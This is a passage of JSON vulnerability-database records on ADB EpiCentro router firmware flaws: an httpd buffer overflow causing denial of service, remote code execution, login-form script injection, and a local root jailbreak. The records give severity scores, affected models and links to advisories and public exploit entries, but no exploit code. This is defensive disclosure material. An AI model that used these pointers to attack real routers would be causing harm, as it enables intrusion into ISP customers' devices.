"data": "Buffer Overflow in httpd in EpiCentro E_7.3.2+ allows attackers to cause a denial of service attack remotely via a specially crafted GET request with a leading \"/\" in the URL. Epicentro Contains a buffer error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. ADBEpicentro is a set of firmware used by ADB in Switzerland for use in ADB gateways and routers. Httpd is one of the HTTP servers. A buffer overflow vulnerability exists in httpd in the ADBEpicentroE_7.3.2+ release. CVE-2018-7633 Script Injection in ADB EpiCentro 7.3.2+ login form language parameter https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7633\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7633\nSeverity: medium\nSeverity Rating: CVSS v3 Base Score: 5,4 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N\nImpact: Execution of injected Javascript\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e \n\n2. 
CVE-2018-7632 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to a Denial of Service condition https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7632\nSeverity: severe\nSeverity Rating: CVSS v3 Base Score: 7,5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\nImpact: Denial of Service\nLocally Exploitable: no\nRemotely Exploitable: Yes\nExplanation: https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/ \u003chttps://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e\n\n3. CVE-2018- 7631 Buffer Overflow in ADB EpiCentro 7.3.2+ httpd leading to Remote Code Execution (RCE) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632 \u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7632\u003e \nProduct: EpiCentro\nVendor: ADB Global\nTested Version: 7.3.2\nCVE ID: 2018-7631\nSeverity: critical\nSeverity Rating: CVSS v3 Base Score: 10,0 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\nImpact: Code Execution\nLocally Exploitable: no\nRemotely Exploitable: Yes\n\nExplanation: https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/ \u003chttps://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e \n\nThe vulnerabilities were discovered and disclosed to the manufacturer ADB and the ISP A1 Telekom Austria prior to general public announcement. In accordance to information received from both parties a fix has been produced and rolled out to all customers / devices. I have not examined the fix and therefore can not comment on its effectivity. 
\n\nFelix\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "PACKETSTORM",
"id": "149976"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7632",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-20660",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "149976",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"id": "VAR-201810-1457",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
}
]
},
"last_update_date": "2023-12-18T13:23:55.689000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7632"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7632\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7633"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7631"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7633-script-injection-in-the-login-form-language-parameter-of-adb-firmware-epicentro-7-3-2/\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/08/cve-2018-7632-buffer-overflow-in-httpd-in-epicentro-e_7-3-2-allows-attackers-to-cause-a-denial-of-service-attack-remotely-via-a-specially-crafted-get-request/\u003e"
},
{
"trust": 0.1,
"url": "https://fschallock.wordpress.com/2018/10/07/cve-2018-7631-rce-in-adb-epicentro-7-3-2-httpd/"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7633\u003e"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"db": "PACKETSTORM",
"id": "149976"
},
{
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"date": "2018-10-26T23:22:22",
"db": "PACKETSTORM",
"id": "149976"
},
{
"date": "2018-10-09T22:29:01.907000",
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-20660"
},
{
"date": "2019-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-011654"
},
{
"date": "2018-12-10T17:23:37.780000",
"db": "NVD",
"id": "CVE-2018-7632"
},
{
"date": "2018-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Epicentro Buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-011654"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-488"
}
],
"trust": 0.6
}
}
VAR-201807-1045
Vulnerability from variot - Updated: 2023-12-18 12:18

All ADB broadband gateways / routers based on the Epicentro platform are affected by a local root jailbreak vulnerability where attackers are able to gain root access on the device, and extract further information such as sensitive configuration data of the ISP (e.g., VoIP credentials) or attack the internal network of the ISP. Multiple ADB broadband gateways and routers contain access control vulnerabilities. Information may be obtained or altered, and service operation may be disrupted (DoS). ADB broadband gateways/routers on the Epicentro platform are gateway and router devices for the Epicentro platform from ADB, Switzerland. A security vulnerability exists in ADB broadband gateways/routers based on the Epicentro platform.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201807-1045",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prg av4202n",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv2220",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv5522",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv2210",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv 2210",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "p.rg av4202n",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 2220",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 5522",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "broadband gateways/routers on epicentro platform",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:dv2210_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:dv2210:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv2220_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv2220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv5522_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv5522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:prg_av4202n_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:prg_av4202n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13108"
}
]
},
"cve": "CVE-2018-13108",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.2,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-13108",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2018-12784",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-123134",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-13108",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-13108",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-12784",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-444",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-123134",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-13108",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "All ADB broadband gateways / routers based on the Epicentro platform are affected by a local root jailbreak vulnerability where attackers are able to gain root access on the device, and extract further information such as sensitive configuration data of the ISP (e.g., VoIP credentials) or attack the internal network of the ISP. plural ADB Broadband gateways and routers contain access control vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBbroadbandgateways/routersonEpicentroplatform is a gateway and router device for the Epicentro platform from ADB, Switzerland. A security vulnerability exists in ADBbroadbandgateways/routers based on the Epicentro platform",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-123134",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44983",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-13108",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "148424",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "44983",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-12784",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-123134",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-13108",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"id": "VAR-201807-1045",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
}
]
},
"last_update_date": "2023-12-18T12:18:41.356000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
},
{
"title": "ADBBroadbandGateways/Routers patch for local root jailbreak vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/133899"
},
{
"title": "ADB broadband gateways/routers on Epicentro platform Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81865"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://packetstormsecurity.com/files/148424/adb-local-root-jailbreak.html"
},
{
"trust": 2.5,
"url": "https://www.exploit-db.com/exploits/44983/"
},
{
"trust": 2.4,
"url": "http://seclists.org/fulldisclosure/2018/jul/17"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/archive/1/542117/100/0/threaded"
},
{
"trust": 1.8,
"url": "https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-13108"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-13108"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"db": "VULHUB",
"id": "VHN-123134"
},
{
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"date": "2018-07-06T00:00:00",
"db": "VULHUB",
"id": "VHN-123134"
},
{
"date": "2018-07-06T00:00:00",
"db": "VULMON",
"id": "CVE-2018-13108"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007687"
},
{
"date": "2018-07-06T14:29:01.053000",
"db": "NVD",
"id": "CVE-2018-13108"
},
{
"date": "2018-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-444"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12784"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-123134"
},
{
"date": "2019-10-03T00:00:00",
